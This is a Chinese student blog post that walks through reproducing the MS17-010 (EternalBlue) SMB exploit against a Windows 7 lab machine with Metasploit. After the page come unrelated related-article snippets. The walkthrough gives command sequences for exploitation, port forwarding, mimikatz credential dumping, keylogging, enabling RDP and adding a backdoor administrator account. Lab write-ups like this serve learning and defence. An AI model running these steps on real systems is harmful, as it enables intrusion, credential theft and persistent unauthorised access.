ms17-010(永恒之蓝漏洞复现)

news2024/12/25 0:53:19

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :HW-2023-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


文章目录

      • 一、原理
        • 永恒之蓝漏洞简介:
        • 445端口简介:
      • 二、实验环境
      • 三、漏洞复现
        • Step1:启动msf
        • Step2:搜索search ms17-010模块
        • Step3:使用辅助模块扫描是否存在永恒之蓝漏洞
        • Step4:使用攻击模块
        • Step5:查看本机信息
        • Step6:端口转发
        • Step7:获取屏幕数据
        • Step8:获取密码
        • Step9:键盘监听
        • step10:开启远程
        • Step11:进入cmd添加用户

一、原理

永恒之蓝漏洞简介:

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers (影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows 系统的SMB漏洞可以获取系统最高权限。
5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
黑客利用永恒之蓝工具成功利用漏洞攻击电脑获取系统最高权限执行勒索病毒程序。(自动化)

445端口简介:

445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉! 2017年10月,由于病毒"坏兔子"(勒索病毒)来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。

二、实验环境

靶机win7
ip地址:192.168.204.160
登录密码:123456
攻击机:kail linux
ip地址:192.168.204.128

三、漏洞复现

Step1:启动msf

msfconsole
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Hb74o3Xh-1676285655630)(https://secure2.wostatic.cn/static/emGAG5LEipvjvtHmRh6kgL/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-uQL9trX71BBzQatewsBXAX-0-fe0a6c1cd8a93d949dbbc4f92d9bfcc2#id=Sok7T&originHeight=433&originWidth=898&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

Step2:搜索search ms17-010模块

search ms17-010
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-du7MfcgE-1676285655630)(https://secure2.wostatic.cn/static/9C6mZfubKQvfYn2kjLhgwa/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-xuhCvd9MMXPS6fBioTjPE5-0-20ee99ed7ccb4a37cabcce32fc3f1dd0#id=mIgrk&originHeight=435&originWidth=901&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

  • 其中的两个模块
    • auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞
    • exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击

Step3:使用辅助模块扫描是否存在永恒之蓝漏洞

use 3
show options
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iYTMQZQz-1676285655631)(https://secure2.wostatic.cn/static/61QwQZENmGTPJziu7yYvJi/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-qgB2S6L9zPGXmbXy5M8Ra3-0-dfe02610553a95afe52cccc13c33d7c2#id=giG9c&originHeight=438&originWidth=897&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

设置RHOST并扫描
set rhost 192.168.204.160
run
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WJH98izn-1676285655632)(https://secure2.wostatic.cn/static/8RgLZnipfjf1VkZf9t5rLt/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-kXCWvUcZyKHE9YXMFu2Piw-0-71d9b3f436eee206f0470925bdeb8911#id=l64yX&originHeight=439&originWidth=900&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

【+】是模块返回的信息,【*】是框架返回的信息

Step4:使用攻击模块

use 0
show options
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lNoBnukL-1676285655632)(https://secure2.wostatic.cn/static/fM27vbdr77ghHiUEnt6T2q/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-8nDiVh6QZtKwrLydi8GAPK-0-e3482fbceb393d6e8c5cfba7c96c46cf#id=BqvFR&originHeight=632&originWidth=968&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

设置RHOST并执行
set rhost 192.168.204.160
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wZrDrJKB-1676285655634)(https://secure2.wostatic.cn/static/wbAWRdbXC3FfcZoP8692BM/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-fqiU4ABtKa5diqAZwTCs4Q-0-26b4f1c784bc71d209707441390a54d5#id=i3BGq&originHeight=890&originWidth=1178&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

Step5:查看本机信息

ipconfig
ps 看浏览器或者记事本等进程号
migrate转到相应的进程

Step6:端口转发

portfwd命令是meterpreter内嵌的端口转发器,一般在目标主机开放的端口不允许直接访问的情况下使用,比如说,目标主机开放的远程桌面3389端口只允许内网访问,这时可以使用portfwd命令进行端口转发,以达到直接访问目标主机的目的。portf
wd的帮助信息如下:
portfwd add -l 1234 -r 192.168.204.160 -p 80

解释,假如目标主机192.168.204.160开放了一个网站,端口80,正常访问是 192.168.204.160:80, 端口转发之后,我们自己的电脑就可以用 127.0.0.1:1234 来访问目标网站

portfwd add -l 1235 -r 192.168.204.160 -p 3389
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RAaCH15O-1676285655635)(https://secure2.wostatic.cn/static/4r4neqbqVCE9vpSMu7PnRN/%E5%9B%BE%E7%89%87.png?auth_key=1673519946-ioasZ1XpxUrWvnv6kH47k1-0-2b21e71ae9123049a47b90aa307df0f0#id=n6J97&originHeight=132&originWidth=509&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)]

Step7:获取屏幕数据

screenshot

Step8:获取密码

使用 mimikatz 插件
load mimikatz
creds_all
load kiwi # 没用到
wdigest #没用到

Step9:键盘监听

(没成功)
(1) keyscan_start: 启动时与如 Word 或浏览器的进程相关联的键盘记录软件
(2) keyscan_dump 键盘记录软件的内容转储,此时可以看到刚刚在靶机上输入的内容
(3) keyscan_stop: -停止键盘记录软件

step10:开启远程

(1)run post/windows/manage/enable_rdp 或 run getgui -e
利用此后渗透模块即可直接开启远程桌面
(2)KaliLinux操作系统中的rdesktop 靶机地址 命令即可直接使用root账号登录到靶机系统中
(3)在msf软件里run vnc 或者新建终端 rdesktop 目标IP

Step11:进入cmd添加用户

shell
net user admin 123456 /add
net localgroup administrators 用户名 /add

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/344170.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Inception-Resnet-v1、Inception-Resnet-v2学习笔记

Inception-Resnet-v1、Inception-Resnet-v2来自2016年谷歌发表的这篇论文:Inception-v4 Inception-ResNet and the Impact of Residual Connections on Learning,附论文链接: [1602.07261] Inception-v4, Inception-ResNet and the Impact o…

【思维模型】概率思维的价值:找到你的人生算法!打开你的人生格局!实现认知跃迁!

把同样公平的机会放在放在很多人面前,不同的人生算法,会得到迥然不同的结果。 概率思维是什么? 【ChatGPT】概率思维是一种通过使用数学模型来思考和评估不确定性事件的方法。它通过计算不同可能性的概率来预测事件的结果,并评估风险和机会。 概率思维的价值在于它可以帮…

CSS样式表继承和优先级

CSS样式表继承 要想了解css样式表的继承,我们先从文档树(HTML DOM)开始。文档树由HTML元素组成。 文档树和家族树类似,也有祖先、后代、父亲、孩子和兄弟_。 那么CSS样式表继承指的是,特定的CSS属性向下传递到子孙元…

智能三子棋(人机大战)—— 你会是最终赢家吗?万字讲解让你实现与自己对弈

魔王的介绍:😶‍🌫️一名双非本科大一小白。魔王的目标:🤯努力赶上周围卷王的脚步。魔王的主页:🔥🔥🔥大魔王.🔥🔥🔥 ❤️‍&#x1…

2023年湖北建设厅七大员八大员报名怎么收费呢?

建设厅七大员八大员全国统一报名网站,证书全国通用,无需调转,这点还是很方便的,所有在湖北考的证书全国都能用呢。 八大员报考机构很多,收费也是层次不齐,这里需要提醒大家注意的是,咨询八大员的…

如何持续架构治理?我们和 ChatGPT 聊了一会?

在上周的 QCon 北京 2022 大会上,我和我的同事黄雨青一起分享了《组织级架构治理的正确方式》,以帮助开发人员对组织级架构治理体系全貌一瞥,并厘清治理工具的设计思路和核心功能内容。结合我们在 ArchGuard 的探索经验,我们&…

自有APP上如何运行小游戏?

近年来小程序游戏迎来了爆发式增长。微信、支付宝、抖音等各大平台小程序游戏愈加丰富,你是否也让自己的App也拥有运行丰富的小游戏的能力?今天就来带大家看看如何实现。 我们先来看看各互联网巨头关于小游戏生态的特征: 「微信」 率先推出…

open3d点云配准函数registration_icp

文章目录基本原理open3d调用绘图基本原理 ICP, 即Iterative Closest Point, 迭代点算法。 ICP算法有多种形式,其中最简单的思路就是比较点与点之间的距离,对于点云P{pi},Q{qi}P\{p_i\}, Q\{q_i\}P{pi​},Q{qi​}而言,如果二者是同一目标&am…

如何将一张纹理图贴在模型上

前言 小伙伴们是否有过这样的场景:看到一个精美的3D模型,很想知道它是如何被创作出来的?于是开始了一番搜索引擎查找之后,得知需要建模工具来完成,例如3D Max、Maya、Blender、Photoshop。那么本篇就使用这些工具来完成一个精美的…

Redis【包括Redis 的安装+本地远程连接】

Redis 一、为什么要用缓存? 缓存定义 缓存是一个高速数据交换的存储器,使用它可以快速的访问和操作数据。 程序中的缓存 在我们程序中,如果没有使用缓存,程序的调用流程是直接访问数据库的; 如果多个程序调用一个数…

如何在原始的认知上找回自己

认知、欲望加恐惧,这三种要素在我们对一个事物的判断中都在起作用,只不过配比不一样,导致你的判断不一样。我们通常以为有了认知能力,就产生了认知,就如同面前有一个东西,你用照相机拍下来就成了一张照片—…

【算法基础】高精度除法

👦个人主页:Weraphael ✍🏻作者简介:目前是C语言 算法学习者 ✈️专栏:【C/C】算法 🐋 希望大家多多支持,咱一起进步!😁 如果文章对你有帮助的话 欢迎 评论&#x1f4ac…

PN外加电场后电场变化

没有外加电场时(下面都是以外加反向电场分析) 中间两条实线假设是PN节在没有外加电场的情况下形成的一个内部电场边界。 形成原因 实用的半导体一般是混合物 P型半导体,实际上是一种4价和3价元素的混合物。化学中都知道达到4或8的外层电子…

论文浅尝 | KGE by Adaptive Limit Scoring Loss Using DWS

笔记整理:陈磊,天津大学硕士链接:https://ieeexplore.ieee.org/ielx7/6287639/7859429/08057770.pdf动机设计一个强大而有效的损失框架对于知识图嵌入模型区分正确和不正确的三元组至关重要。经典的基于边距的排名损失将正负三元组的分数限制…

极智AI | 算能SDK架构

欢迎关注我的公众号 [极智视界],获取我的更多经验分享 大家好,我是极智视界,本文介绍一下 算能SDK架构。 邀您加入我的知识星球「极智视界」,星球内有超多好玩的项目实战源码下载,链接:https://t.zsxq.com…

华芯微特开发环境搭建-SWM34SVET6为例

SWM34S系列是cortex-M33,内核是arm-v8指令集,和其他cortex系列有差异,要新的工具版本支持(jlink要升级到V9以上,keil要升级到5.32以上)。 1.Keil要先安装5.36的版本,并取得版权(5.3…

【MYSQL中级篇】数据库数据查询学习

🍁博主简介 🏅云计算领域优质创作者   🏅华为云开发者社区专家博主   🏅阿里云开发者社区专家博主 💊交流社区:运维交流社区 欢迎大家的加入! 相关文章 文章名文章地址【MYSQL初级篇】入门…

网络安全-Kali更新源(APT)

网络安全-Kali更新源(APT) 这篇东东很少内容 Kali是基于乌班图开发出来的 这个APT不是攻击的那个APT 这个APT和centos里面的YUM是一样的 下面是介绍的一些国内的APT包,我自己用的阿里云 通俗点怎么理解呢,你手机里面的应用市场,苹…

【闲聊】我用ChatGPT参加了大数据面试

用Chat GPT试了试面试题,回答得比较简单。 问:你可以以应聘者的身份参加一场大数据程序员面试吗 答:可以 ,如果您符合面试要求,可以参加大数据程序员面试。 问:那么为什么你要投递大数据开发这个岗位 答&am…

数据结构总结

数据结构总结排序算法冒泡排序选择排序插入排序希尔排序堆排序快速排序算法归并排序计数排序基数排序树红黑树基本概念规则B树基础知识规则B树图回溯算法并查集拓扑排序其他算法KMP算法例题数组类求最大和子数组求子数组最大乘积删除重复链表元素十大排序算法参考 排序算法 冒…